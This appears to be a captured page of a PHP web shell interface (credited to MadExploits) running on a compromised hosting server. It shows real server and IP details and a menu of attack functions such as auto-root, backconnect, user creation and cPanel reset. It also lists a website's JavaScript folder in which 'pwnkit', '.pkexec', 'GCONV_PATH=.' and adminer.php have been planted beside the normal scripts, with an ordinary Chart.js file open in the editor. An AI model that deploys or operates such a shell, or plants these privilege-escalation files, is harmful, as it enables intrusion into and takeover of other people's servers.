Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.127
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
CMS-NEW /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ace.js
798
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
apexcharts.js
12.18
KB
-rw-r--r--
app.js
251.9
KB
-rw-r--r--
bootstrap-colorpicker.js
74
B
-rw-r--r--
bootstrap-maxlength.js
795
B
-rw-r--r--
carousel.js
1.74
KB
-rw-r--r--
chartjs.js
6.56
KB
-rw-r--r--
chat.js
586
B
-rw-r--r--
cropper.js
1.43
KB
-rw-r--r--
dashboard.js
11.76
KB
-rw-r--r--
data-table.js
823
B
-rw-r--r--
datepicker.js
369
B
-rw-r--r--
demo.js
203
B
-rw-r--r--
dropify.js
64
B
-rw-r--r--
dropzone.js
98
B
-rw-r--r--
email.js
280
B
-rw-r--r--
form-validation.js
1.59
KB
-rw-r--r--
fullcalendar.js
10.09
KB
-rw-r--r--
inputmask.js
99
B
-rw-r--r--
jquery.flot.js
5.18
KB
-rw-r--r--
morris.js
1.65
KB
-rw-r--r--
peity.js
211
B
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
select2.js
228
B
-rw-r--r--
simplemde.js
187
B
-rw-r--r--
sparkline.js
2.98
KB
-rw-r--r--
spinner.js
300
B
-rw-r--r--
sweet-alert.js
4.9
KB
-rw-r--r--
tags-input.js
270
B
-rw-r--r--
template.js
4.05
KB
-rw-r--r--
timepicker.js
134
B
-rw-r--r--
tinymce.js
876
B
-rw-r--r--
typeahead.js
1.88
KB
-rw-r--r--
wizard.js
294
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : chartjs.js
$(function() { 'use strict'; // Bar chart if($('#chartjsBar').length) { new Chart($("#chartjsBar"), { type: 'bar', data: { labels: [ "China", "America", "India", "Germany", "Oman"], datasets: [ { label: "Population", backgroundColor: ["#b1cfec","#7ee5e5","#66d1d1","#f77eb9","#4d8af0"], data: [2478,5267,734,2084,1433] } ] }, options: { legend: { display: false }, } }); } if($('#chartjsLine').length) { new Chart($('#chartjsLine'), { type: 'line', data: { labels: [1500,1600,1700,1750,1800,1850,1900,1950,1999,2050], datasets: [{ data: [86,114,106,106,107,111,133,221,783,2478], label: "Africa", borderColor: "#7ee5e5", backgroundColor: "rgba(0,0,0,0)", fill: false }, { data: [282,350,411,502,635,809,947,1402,3700,5267], label: "Asia", borderColor: "#f77eb9", backgroundColor: "rgba(0,0,0,0)", fill: false } ] } }); } if($('#chartjsDoughnut').length) { new Chart($('#chartjsDoughnut'), { type: 'doughnut', data: { labels: ["Africa", "Asia", "Europe"], datasets: [ { label: "Population (millions)", backgroundColor: ["#7ee5e5","#f77eb9","#4d8af0"], data: [2478,4267,1334] } ] } }); } if($('#chartjsArea').length) { new Chart($('#chartjsArea'), { type: 'line', data: { labels: [1500,1600,1700,1750,1800,1850,1900,1950,1999,2050], datasets: [{ data: [86,114,106,106,107,111,133,221,783,2478], label: "Africa", borderColor: "#7ee5e5", backgroundColor: "#c2fdfd", fill: true }, { data: [282,350,411,502,635,809,947,1402,3700,5267], label: "Asia", borderColor: "#f77eb9", backgroundColor: "#ffbedd", fill: true } ] } }); } if($('#chartjsPie').length) { new Chart($('#chartjsPie'), { type: 'pie', data: { labels: ["Africa", "Asia", "Europe"], datasets: [{ label: "Population (millions)", backgroundColor: ["#7ee5e5","#f77eb9","#4d8af0"], data: [2478,4267,1334] }] } }); } if($('#chartjsBubble').length) { new Chart($('#chartjsBubble'), { type: 'bubble', data: { labels: "Africa", datasets: [ { label: ["China"], backgroundColor: "#c2fdfd", borderColor: "#7ee5e5", data: [{ x: 21269017, y: 5.245, r: 15 }] }, { label: ["Denmark"], backgroundColor: "#ffbedd", borderColor: "#f77eb9", data: [{ x: 258702, y: 7.526, r: 10 }] }, { label: ["Germany"], backgroundColor: "#bbd4ff", borderColor: "#4d8af0", data: [{ x: 3979083, y: 6.994, r: 15 }] }, { label: ["Japan"], backgroundColor: "#ffe69d", borderColor: "#fbbc06", data: [{ x: 4931877, y: 5.921, r: 15 }] } ] }, options: { scales: { yAxes: [{ scaleLabel: { display: true, labelString: "Happiness" } }], xAxes: [{ scaleLabel: { display: true, labelString: "GDP (PPP)" } }] } } }); } if($('#chartjsRadar').length) { new Chart($('#chartjsRadar'), { type: 'radar', data: { labels: ["Africa", "Asia", "Europe", "Latin America", "North America"], datasets: [ { label: "1950", fill: true, backgroundColor: "#ffbedd", borderColor: "#f77eb9", pointBorderColor: "#f77eb9", pointBackgroundColor: "#ffbedd", data: [8.77,55.61,21.69,6.62,6.82] }, { label: "2050", fill: true, backgroundColor: "#c2fdfd", borderColor: "#7ee5e5", pointBorderColor: "#7ee5e5", pointBackgroundColor: "#c2fdfd", pointBorderColor: "#fff", data: [25.48,54.16,7.61,8.06,4.45] } ] } }); } if($('#chartjsPolarArea').length) { new Chart($('#chartjsPolarArea'), { type: 'polarArea', data: { labels: ["Africa", "Asia", "Europe", "Latin America"], datasets: [ { label: "Population (millions)", backgroundColor: ["#f77eb9", "#7ee5e5","#4d8af0","#fbbc06"], data: [2478,5267,734,784] } ] } }); } if($('#chartjsGroupedBar').length) { new Chart($('#chartjsGroupedBar'), { type: 'bar', data: { labels: ["1900", "1950", "1999", "2050"], datasets: [ { label: "Africa", backgroundColor: "#f77eb9", data: [133,221,783,2478] }, { label: "Europe", backgroundColor: "#7ee5e5", data: [408,547,675,734] } ] } }); } if($('#chartjsMixedBar').length) { new Chart($('#chartjsMixedBar'), { type: 'bar', data: { labels: ["1900", "1950", "1999", "2050"], datasets: [{ label: "Europe", type: "line", borderColor: "#66d1d1", backgroundColor: "rgba(0,0,0,0)", data: [408,547,675,734], fill: false }, { label: "Africa", type: "line", borderColor: "#ff3366", backgroundColor: "rgba(0,0,0,0)", data: [133,221,783,2478], fill: false }, { label: "Europe", type: "bar", backgroundColor: "#f77eb9", // backgroundColor: "rgba(0,0,0,0)", data: [408,547,675,734], }, { label: "Africa", type: "bar", backgroundColor: "#7ee5e5", backgroundColorHover: "#3e95cd", // backgroundColor: "rgba(0,0,0,0)", data: [133,221,783,2478] } ] } }); } });
Close